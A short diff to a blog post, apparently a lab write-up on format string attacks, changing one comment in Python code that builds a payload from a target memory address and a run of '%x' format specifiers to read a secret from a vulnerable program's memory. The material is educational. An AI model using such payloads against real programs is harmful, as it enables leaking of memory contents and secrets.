iukadike/blog/_posts/2023-09-10-format-string-attack.md

 # Start input with the memory address of secret message
 content = (0x080b4008).to_bytes(4,byteorder='little')

-# Append multiple format specifiers to prevent the program from crashing
+# Append format specifiers to prevent the program from crashing
 content += ("_%x" * 63).encode('latin-1')

 # print out the value stored in 0x080b4008